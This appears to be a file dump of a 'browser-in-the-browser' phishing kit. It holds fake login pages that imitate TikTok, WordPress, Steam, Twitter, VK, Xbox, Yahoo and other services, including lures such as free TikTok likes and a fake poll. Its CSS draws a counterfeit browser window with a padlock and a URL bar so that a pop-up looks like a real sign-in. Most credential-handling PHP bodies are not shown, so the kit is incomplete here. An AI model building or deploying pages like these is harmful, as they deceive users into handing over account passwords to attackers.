n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /sites/yandex/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/spotify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/stackoverflow/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/stackoverflow/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/steam/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/steam/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/tiktok/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/tiktok/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Tik Tok Followers 9 | 10 | 11 | 12 | 26 | 27 | 28 |
29 |
30 |
31 |

Login

32 |

Login to get 1000 Tiktok Likes Free

33 | 34 |
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 | 43 |
44 | 45 |

46 | 47 |
48 | 49 |
50 |
51 | 52 | 55 | 56 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /sites/yandex/tiktok/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/tiktok/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/tiktok/logo.png -------------------------------------------------------------------------------- /sites/yandex/tiktok/sadflix.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/tiktok/sadflix.ttf -------------------------------------------------------------------------------- /sites/yandex/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/twitch/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/twitter/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/vk/counter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/vk/counter -------------------------------------------------------------------------------- /sites/yandex/vk/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/vk/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/vk_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/vk_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | VoteRank #289032 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 |
25 |
26 |
 
27 |
28 |
29 |
30 |
31 | 32 |
33 |
34 |
35 |
36 | 37 | 38 |

 

39 | 40 |
41 | 42 |
43 | 44 |
45 | 46 | 47 | 48 |
49 |
50 | 51 |
52 |
53 |
54 |
55 | 56 |
57 |
58 | 59 |
60 | 61 |
62 | 63 | 64 |
65 |
66 | 67 | 68 | 69 | 70 | 71 |
73 |
74 |
75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /sites/yandex/vk_poll/p.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/vk_poll/p.gif -------------------------------------------------------------------------------- /sites/yandex/vk_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thnak You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VoteRank

14 |

#56353514

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /sites/yandex/vk_poll/s_c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/vk_poll/s_c.js -------------------------------------------------------------------------------- /sites/yandex/vk_poll/top_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/vk_poll/top_logo.png -------------------------------------------------------------------------------- /sites/yandex/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/wordpress/login.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | Log In — WordPress 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 |

Powered by WordPress

17 | 18 |
19 |

20 | 22 |

23 |

24 | 26 |

27 |

28 |

29 | 30 | 31 | 32 |

33 |
34 | 35 | 38 | 39 | 52 | 53 |

← Back

54 | 55 |
56 | 57 | 58 |
59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /sites/yandex/wordpress/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/wordpress/wordpress-logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/xbox/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/xbox/index.php -------------------------------------------------------------------------------- /sites/yandex/xbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/xbox/pass.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/xbox/pass.php -------------------------------------------------------------------------------- /sites/yandex/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/yahoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/yahoo/yahoo_en-US_f_p_bestfit_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/yahoo/yahoo_en-US_f_p_bestfit_2x.png -------------------------------------------------------------------------------- /ssl.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /style.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: system; 3 | font-style: normal; 4 | font-weight: 300; 5 | src: local(".SFNSText-Light"), local(".HelveticaNeueDeskInterface-Light"), 6 | local("Roboto-Light"), local("DroidSans"), local("Tahoma"), 7 | local(".LucidaGrandeUI"), local("Ubuntu Light"), local("Segoe UI Light"); 8 | } 9 | 10 | html, 11 | body { 12 | width: 100%; 13 | height: 100%; 14 | } 15 | 16 | #title-bar { 17 | height: 31px; 18 | background-color: black; 19 | width: 100%; 20 | display: flex; 21 | justify-content: space-between; 22 | user-select: none; 23 | } 24 | 25 | #logo { 26 | padding-left: 5px; 27 | vertical-align: middle; 28 | } 29 | 30 | #logo-description { 31 | color: white; 32 | font-size: 12px; 33 | font-family: "system"; 34 | vertical-align: middle; 35 | } 36 | 37 | #minimize { 38 | color: white; 39 | font-size: 12px; 40 | padding: 9px 15px 7px 15px; 41 | } 42 | 43 | #square { 44 | color: white; 45 | font-size: 22px; 46 | padding: 0px 15px 5px 15px; 47 | } 48 | 49 | #exit { 50 | color: white; 51 | font-size: 15px; 52 | padding: 7px 17px 7px 17px; 53 | } 54 | 55 | #url-bar { 56 | height: 28px; 57 | background-color: #1b1a1a; 58 | width: 100%; 59 | display: flex; 60 | align-items: center; 61 | white-space: nowrap; 62 | overflow: scroll; 63 | text-overflow: ellipsis; 64 | -ms-overflow-style: none; 65 | scrollbar-width: none; 66 | } 67 | 68 | #url-bar::-webkit-scrollbar { 69 | display: none; 70 | } 71 | 72 | #ssl-padlock { 73 | user-select: none; 74 | padding-left: 8px; 75 | margin-right: 8px; 76 | } 77 | 78 | #domain-name { 79 | color: white; 80 | font-size: 14px; 81 | font-family: "system"; 82 | } 83 | 84 | #domain-path { 85 | color: #9c9898; 86 | font-size: 14px; 87 | font-family: "system"; 88 | } 89 | 90 | #title-bar-width { 91 | width: calc(100% + 2px); /* 2px added to allow for border on iframe */ 92 | } 93 | 94 | #content { 95 | width: 100%; 96 | height: 700px; 97 | border: 1px solid gray; 98 | } 99 | 100 | #window { 101 | color: transparent; 102 | background-color: transparent; 103 | border-color: transparent; 104 | box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px; 105 | height: 759px; /* title bar height + content height */ 106 | width: 40%; 107 | } 108 | -------------------------------------------------------------------------------- /style2.css: -------------------------------------------------------------------------------- 1 | * { 2 | padding: 0; 3 | margin: 0; 4 | box-sizing: border-box; 5 | } 6 | html,body{ 7 | width: 100%; 8 | height: 100%; 9 | padding-top: 3%; 10 | } 11 | #full{ 12 | width: 70%; 13 | height: 70%; 14 | position: absolute; 15 | /* background-color: rgb(107, 124, 126); */ 16 | margin-left: 12%; 17 | 18 | } 19 | 20 | #main{ 21 | width: 90%; 22 | height: 90%; 23 | position: absolute; 24 | display: flex; 25 | left:50%; 26 | top: 50%; 27 | transform: translate(-50% , -50% ); 28 | border-radius: 10px; 29 | 30 | overflow: hidden; 31 | box-shadow: 0 3px 6px 0 #e9e8e8; 32 | } 33 | 34 | #left{ 35 | width: 40%; 36 | height: 100%; 37 | background-color: rgb(31, 137, 118); 38 | font-family: open sans; 39 | color: white; 40 | position: relative; 41 | 42 | 43 | } 44 | #right{ 45 | width: 60%; 46 | height: 100%; 47 | background-color: rgb(255, 255, 255); 48 | position: relative; 49 | 50 | } 51 | #social{ 52 | display: flex; 53 | width: 140px; 54 | align-items: center; 55 | justify-content: space-between; 56 | margin-left: 200px; 57 | margin-bottom: 15px; 58 | margin-top: 15px; 59 | } 60 | .icon{ 61 | width: 35px; 62 | height: 35px; 63 | border-radius: 100%; 64 | background-color: rgb(243, 243, 243); 65 | box-shadow: 0 4px 7px 0 hsla(215, 21%, 74%, 0.862); 66 | position: relative; 67 | } 68 | 69 | i{ 70 | position: absolute; 71 | left:50%; 72 | top: 50%; 73 | transform: translate(-50% , -50% ); 74 | font-size: 17px; 75 | font-weight: 800; 76 | color: black; 77 | box-shadow: #f0f0f0; 78 | 79 | 80 | } 81 | #box{ 82 | width: 300px; 83 | height: 500px; 84 | } 85 | .fild{ 86 | 87 | margin-top: 30px; 88 | } 89 | 90 | .fild input{ 91 | width: 250px; 92 | height: 35px; 93 | margin-bottom: 10px; 94 | border: none; 95 | background-color: #f0f0f0ef; 96 | padding: 10px; 97 | border-radius: 5px; 98 | font-size: 12px; 99 | margin-left: 150px; 100 | 101 | } 102 | #lcontent{ 103 | width: 80%; 104 | height: 80%; 105 | 106 | position: absolute; 107 | left: 50%; 108 | top: 50%; 109 | transform: translate(-50%,-50%); 110 | padding: ; 111 | } 112 | #rcontent{ 113 | width: 80%; 114 | height: 80%; 115 | position: absolute; 116 | left: 50%; 117 | top: 50%; 118 | transform: translate(-50%,-50%); 119 | padding: ; 120 | } 121 | #create_account{ 122 | font-family: open sans; 123 | color: rgb(0, 0, 0); 124 | font-size: 25px; 125 | font-weight: 800; 126 | margin-left: 175px; 127 | margin-top: 30px; 128 | 129 | } 130 | h3{ 131 | margin-top: 85px; 132 | font-family: open sans; 133 | 134 | font-weight: 600; 135 | font-size: 25px; 136 | } 137 | h5{ 138 | font-size: 12px; 139 | align-items: center; 140 | margin-left: 170px; 141 | margin-bottom: 25px; 142 | margin-top: 30px; 143 | font-family: open sans; 144 | opacity: 0.5; 145 | color: black; 146 | 147 | } 148 | p{ 149 | font-size: 12px; 150 | align-items: center; 151 | 152 | margin-bottom: 20px; 153 | margin-top: 20px; 154 | font-family: open sans; 155 | font-weight: 300; 156 | } 157 | button{ 158 | width: 150px; 159 | height: 40px; 160 | border-radius: 25px; 161 | border: 1px solid white; 162 | color: #000000; 163 | background-color: rgb(195, 202, 203); 164 | margin-top: 30px; 165 | margin-bottom: 30px; 166 | margin-left: 200px; 167 | font-size: 12px; 168 | } 169 | 170 | #button 171 | { 172 | width: 150px; 173 | height: 40px; 174 | border-radius: 25px; 175 | border: 1px solid rgb(255, 255, 255); 176 | color: rgb(31, 137, 118); 177 | background-color: rgb(207, 204, 204); 178 | text-align: center; 179 | padding: 8px; 180 | margin-top: 40px; 181 | padding-top: 10px; 182 | font-size: 12px; 183 | font-weight: bolder; 184 | 185 | 186 | } 187 | h1{ 188 | font-family: open sans; 189 | font-size: small; 190 | margin: 10px; 191 | } --------------------------------------------------------------------------------